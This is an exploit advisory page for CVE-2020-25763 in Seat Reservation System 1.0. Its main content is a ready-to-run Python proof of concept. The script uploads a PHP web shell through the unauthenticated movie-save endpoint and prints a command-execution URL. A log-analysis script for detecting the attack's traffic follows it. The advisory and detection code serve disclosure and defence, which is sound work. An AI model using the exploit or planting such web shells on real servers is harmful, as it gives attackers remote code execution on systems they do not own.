Seat Reservation System 1.0 Shell Upload

21 Sep 2020 00:00:00 | Reported by Rahul Ramkumar | Type: packetstorm | Source: packetstormsecurity.com | 189 Views

Seat Reservation System 1.0 Unauthenticated Remote Code Execution via PHP File Uploa

Related

| Reporter | Title | Published |
|---|---|---|
| Circl | CVE-2020-25763 | 30 Sep 2020 22:58 |
| Check Point Advisories | Seat Reservation System Arbitrary File Upload (CVE-2020-25763) | 25 Nov 2020 00:00 |
| CVE | CVE-2020-25763 | 29 Sep 2020 19:17 |
| Cvelist | CVE-2020-25763 | 29 Sep 2020 19:17 |
| Exploit DB | Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated) | 16 Oct 2020 00:00 |
| NVD | CVE-2020-25763 | 30 Sep 2020 18:15 |
| OSV | CVE-2020-25763 | 30 Sep 2020 18:15 |
| Prion | Unrestricted file upload | 30 Sep 2020 18:15 |
| RedhatCVE | CVE-2020-25763 | 22 May 2025 17:55 |

Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files.

Vendor Homepage: www.sourcecodester.com

Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip

Author: Rahul Ramkumar

Date: 2020-09-16

CVE: CVE-2020-25763

PoC:

```python
# Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code Execution
import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import random
import string

def print_usage(STRING):
    return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
        print print_usage("Example:\t python %s 'https://192.168.1.72:443/seat_reservation/'" % sys.argv[0])
        sys.exit(-1)
    SERVER_URL = sys.argv[1]
    UPLOAD_DIR = 'admin/ajax.php?action=save_movie'
    UPLOAD_URL = SERVER_URL + UPLOAD_DIR
    random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)])
    webshell = random+'.php'

    s = requests.Session()
    s.get(SERVER_URL, verify=False)
    image = {
        'cover':
        (
            webshell,
            '<?php echo shell_exec($_GET["d3crypt"]); ?>',
            'application/php',
            {'Content-Disposition': 'form-data'}
        )
    }
    fdata = {'id': '','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'}
    r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False)
    r2 = s.get(SERVER_URL, verify=False)
    response_page = r2.content.decode("utf-8")
    parser = etree.HTMLParser()
    tree = etree.parse(StringIO(response_page), parser=parser)
    def get_links(tree):
        refs = tree.xpath("//img")
        links = [link.get('src', '') for link in refs]
        return [l for l in links]

    links = get_links(tree)
    print('Access your webshell at: ')
    for link in links:
        if webshell in link:
            print(SERVER_URL + link+'?d3crypt=whoami')
```
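
A log check for the traffic pattern the PoC produces, added here as an example and not part of the original advisory: it flags POSTs to `admin/ajax.php?action=save_movie` and any later request that is served from a `.php` file outside a baseline of the application's own scripts. The log lines, the `KNOWN_SCRIPTS` baseline and the `UPLOAD_DIR` path segment are constructed assumptions; the page does not name the upload folder.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in Apache combined log format (not real traffic).
# UPLOAD_DIR is a placeholder: the page does not name the upload folder.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Sep/2020:10:01:02 +0000] "GET /seat_reservation/ HTTP/1.1" 200 5120 "-" "python-requests/2.24.0"
203.0.113.7 - - [21/Sep/2020:10:01:03 +0000] "POST /seat_reservation/admin/ajax.php?action=save_movie HTTP/1.1" 200 1 "-" "python-requests/2.24.0"
203.0.113.7 - - [21/Sep/2020:10:01:04 +0000] "GET /seat_reservation/ HTTP/1.1" 200 5300 "-" "python-requests/2.24.0"
203.0.113.7 - - [21/Sep/2020:10:01:09 +0000] "GET /seat_reservation/UPLOAD_DIR/Ab3dEf6hIj9kLm2n.php?d3crypt=whoami HTTP/1.1" 200 9 "-" "curl/7.68.0"
198.51.100.20 - - [21/Sep/2020:10:02:00 +0000] "GET /seat_reservation/index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
# Assumed baseline of PHP scripts shipped with the application (hypothetical list).
KNOWN_SCRIPTS = {"/seat_reservation/index.php", "/seat_reservation/admin/ajax.php"}

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def analyze(log_text, known_scripts):
    """Return (uploads, suspects) found in combined-format access log text."""
    uploads, suspects = [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        path = url.path.lower()
        # 1) POST to the movie-save endpoint the PoC uploads through.
        if (m["method"] == "POST" and path.endswith("/admin/ajax.php")
                and "action=save_movie" in url.query.split("&")):
            uploads.append((m["ip"], m["ts"]))
        # 2) After any such POST, a served .php script outside the baseline.
        elif (uploads and path.endswith(".php") and m["status"] == "200"
                and path not in known_scripts):
            suspects.append((m["ip"], url.path, url.query))
    return uploads, suspects

if __name__ == "__main__":
    ups, sus = analyze(SAMPLE_LOG, KNOWN_SCRIPTS)
    for ip, ts in ups:
        print("upload POST from %s at %s" % (ip, ts))
    for ip, path, query in sus:
        print("unexpected PHP script requested by %s: %s?%s" % (ip, path, query))
```

Access logs do not show whether the POST carried an admin session, so every hit on the upload endpoint is reported and should be matched against legitimate admin activity.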

Vulners AI Score: 9.7 (High risk)

EPSS: 0.12349